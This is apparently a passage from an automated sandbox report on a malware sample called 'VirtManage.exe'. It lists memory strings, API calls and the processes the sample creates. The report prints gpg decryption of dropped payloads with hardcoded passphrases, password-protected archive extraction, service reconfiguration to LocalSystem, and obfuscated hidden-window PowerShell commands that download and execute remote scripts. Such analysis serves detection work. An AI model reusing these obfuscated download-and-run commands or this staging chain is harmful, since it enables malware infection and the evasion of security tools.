Source: powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000020.00000002.2849938491.0000021AC942B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 968B3FD3385208B479FE43CC__F5E8C90CE968B3FD3385208B479FE43CVMware.Binding.WsTrust1.0.0.0{4B1FEDDD-E8BD-8A4B-41BF-2D55E4FD9D86}VMWARE~1.DLL|VMware.Binding.WsTrust.dll_FD9BA260F6E682E262FA42F3C05C6925C__FD9BA260F6E682E262FA42F3C05C6925log4net669E0DDF0BB1AA2A2.0.15.0{2FA634FE-D1FF-771A-58EB-507FF9A0FFBB}LOG4NET.DLL|log4net.dllSourceDir[ProgramFilesFolder][Manufacturer]\[ProductName]DIRCA_TARGETDIRTARGETDIR=""{6DD554EC-2D48-B234-25FF-6CF5942A837D}C__70867F2D6BE94247A3BF24C2A1A54D81.:USER'S~1|User's Programs Menu
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"UUID": null, "ID": "QA3C3Spv34bEjMK7", "Data": "cFmIaqHEfnCmyBPGZRwJvLftovbBJzGgMaibCBmGQkGgdCHEtLVakyxvlnGuRyThDLXneCtjSwQGYlNCiZzipEygHmlodpVWPXpIwyExIWpzqfkkJMwuMxLryCCfrqDUlkYArlhAlZWVYTZNoZIEukXpNSShYZxZoeyLexinkjQAoEbVxJBfNHlYFTSTAefMssQlZgJOeleyBLCXWlvtNQxLbyoWufwnHfNFOlCsvHFbDLPOjSdBbQLImirtZAGuxcBzKUZAqENNkTDTqxcxcZEAcRfuDScBuVqlWtoqxWRzZzXvalEjednWTZSVgPgxKJRhShzgDhUWkWVbMKaqCxEvkNElwNKyVSppgkiLPlxYnLXetDgyfHKSvYQELXbgELMeUlXAXIkWXTQgGRDINnUOqOoynuZyGoLHqgSYWIAkUPrAbUoJxfblvFpGqocgIJTCAEsKSvzTNGVGknicwpfRbBfNOWFcFrcrJrxMnRIxipaplxmVZbtDsUWPrIOJhqjUOtrmaGNelteJyYLhuaXGZBaRtTrIWWvGhWPilmcCTUAomNXtQAorMtGXAujmRyVugqnEexGVjTMMnNNevchXuCwAxLUlQEhUzpbZZyAsSDJtCOLqqxuVbTHnovpheklTeCzQsMrdBzuarVyYCDqKvoUtuxlvUZoyLmElzQoRsUmUvbXfULtJkkiyAisFxlJMJqpgSvHVgdqyUbwMKxgewowQMKVwdbgTNKeGEVhsPbzpBoYijzROPgqgcfHYnOQcOcNaInCpwjkXZvZhlPHGFSqMhHyzSHXlvgjPPrIHwrihksbVKSjWUzsdsBTVYgixIXPgNujMSMSnCqadCNzvagqVRlcdeaCCYpAuBDQAomShpNDFKsQLOpFLw"}
Source: VirtManage.exe, 00000000.00000003.1068983064.000000000467D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_<
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PlxYnLXetDgyfHKSvYQELXbgELMeUlXAXIkWXTQgGRDINnUOqOoynuZyGoLHqgSYWIAkUPrAbUoJxfblvFpGqocgIJTCAEsKSvzTNGVGknicwpfRbBfNOWFcFrcrJrxMnRIxipaplxmVZbtDsUWPrIOJhqjUOtrmaGNelteJyYLhuaXGZBaRtTrIWWvGhWPilmcCTUAomNXtQAorMtGXAujmRyVugqnEexGVjTMMnNNevchXuCwAxLUlQEhUzpbZZyAsSDJtCOLqqxuVbTHnovpheklTeCzQsMrdBzuarVyYCDqKvoUtuxlvUZoyLmElzQoRsUmUvbXfULtJkkiyAisFxlJMJqpgSvHVgdqyUbwMKxgewowQMKVwdbgTNKeGEVhsPbzpBoYijzROPgqgcfHYnOQcOcNaInCpwjkXZvZhlPHGFSqMhHyzSHXlvgjPPrIHwrihksbVKSjWUzsdsBTVYgixIXPgNujMSMSnCqadCNzvagqVRlcdeaCCYpAuBDQAomShpNDFKsQLOpFLw"}
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hqjUOtrmaGNelteJyYLhuaXGZBaRtTrIWWvGhWPilmcCTUAomNXtQAorMtGXAujmRyVugqnEexGVjTMMnNNevchXuCwAxLUlQEhUzpbZZyAsSDJtCOLqqxuVbTHnovpheklTeCzQsMrdBzuarVyYCDqKvoUtuxlvUZoyLmElzQoRsUmUvbXfULtJkkiyAisFxlJMJqpgSvHVgdqyUbwMKxgewowQMKVwdbgTNKeGEVhsPbzpBoYijzROPgqgcfHYnOQcOcNaInCpwjkXZvZhlPHGFSqMhHyzSHXlvgjPPrIHwrihksbVKSjWUzsdsBTVYgixIXPgNujMSMSnCqadCNzvagqVRlcdeaCCYpAuBDQAomShpNDFKsQLOpFLw
Source: C:\Users\user\Desktop\VirtManage.exeAPI call chain: ExitProcess graph end nodegraph_0-3690
Source: C:\Users\user\Desktop\VirtManage.exeAPI call chain: ExitProcess graph end nodegraph_0-3841
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004014F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\whoami.exeProcess token adjusted: Debug
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0040118E __set_app_type,__p__fmode,__p__commode,Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,1_2_0040118E
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004011B3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,1_2_004011B3
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004013D1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,1_2_004013D1
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0040118E __set_app_type,__p__fmode,__p__commode,Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,3_2_0040118E
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004011B3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,3_2_004011B3
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004013D1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,3_2_004013D1

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: Base64 decoded 6h,Vw~{n$j{]IUjnW"Ui^-UnxGi-zeZ&^rZ$x*&Lzfh^--%Z&ZjgGMjg$x^V{V'jwHjnWyUj["{ftg1zzn7jnWj[5)txxGru1.*'jwSgez^gX(b-zeZ&j[B)]"Ui^]Vm9rUi^UnxzXzy`5"{!VxEZ+b:&
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: Base64 decoded 6h,Vw~{n$j{]IUjnW"Ui^-UnxGi-zeZ&^rZ$x*&Lzfh^--%Z&ZjgGMjg$x^V{V'jwHjnWyUj["{ftg1zzn7jnWj[5)txxGru1.*'jwSgez^gX(b-zeZ&j[B)]"Ui^]Vm9rUi^UnxzXzy`5"{!VxEZ+b:&
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\5FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\1FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\2FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\Cert.txt --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\3FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.comJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\4FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demandJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.comJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA360.tmp" "c:\Users\user\AppData\Local\Temp\b0okydtw\CSCB61681A6E66748218243D78918A832B.TMP"
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:/e $('c:\progra'+'mdata\mic'+'rosoft\wind'+'owsupdate24\kau'+'tix2ae'+'x.t');popd;set-variable x (.(item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*mma*d'}).name).invoke((item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*dname'}).name).invoke('*w-*ct',1,1),[management.automation.commandtypes]::cmdlet)net.webclient);(get-childitem variable:\x).value.((((get-childitem variable:\x).value|get-member)|where-object{(ls variable:\_).value.name-like'*nl*g'}).name).invoke((gci variable:\e).value)|.( ([string]''.normalize)[77,35,46]-join'')"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:/go $('c:\pro'+'gramdata\mic'+'roso'+'ft\logup'+'datewi'+'ndows\wiaph'+'oh7um.t');set-item variable:/fh 'net.webclient';dir ect*;sv bo (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where{(get-childitem variable:\_).value.name-like'*dl*ts'}).name).invoke('ne*ct')(variable fh -value));si variable:2rn ((((get-childitem variable:/bo).value|gm)|where{(get-childitem variable:\_).value.name-like'*nl*g'}).name);invoke-command(($executioncontext|foreach{(get-childitem variable:\_).value.(($executioncontext|gm)[6].name)|foreach{(gci variable:\_).value.newscriptblock((get-childitem variable:/bo).value.((item variable:/2rn).value).invoke((gi variable:/go).value))}}))"
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:/e $('c:\progra'+'mdata\mic'+'rosoft\wind'+'owsupdate24\kau'+'tix2ae'+'x.t');popd;set-variable x (.(item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*mma*d'}).name).invoke((item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*dname'}).name).invoke('*w-*ct',1,1),[management.automation.commandtypes]::cmdlet)net.webclient);(get-childitem variable:\x).value.((((get-childitem variable:\x).value|get-member)|where-object{(ls variable:\_).value.name-like'*nl*g'}).name).invoke((gci variable:\e).value)|.( ([string]''.normalize)[77,35,46]-join'')"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:/go $('c:\pro'+'gramdata\mic'+'roso'+'ft\logup'+'datewi'+'ndows\wiaph'+'oh7um.t');set-item variable:/fh 'net.webclient';dir ect*;sv bo (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where{(get-childitem variable:\_).value.name-like'*dl*ts'}).name).invoke('ne*ct')(variable fh -value));si variable:2rn ((((get-childitem variable:/bo).value|gm)|where{(get-childitem variable:\_).value.name-like'*nl*g'}).name);invoke-command(($executioncontext|foreach{(get-childitem variable:\_).value.(($executioncontext|gm)[6].name)|foreach{(gci variable:\_).value.newscriptblock((get-childitem variable:/bo).value.((item variable:/2rn).value).invoke((gi variable:/go).value))}}))"
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_6C701096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_6C701096
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
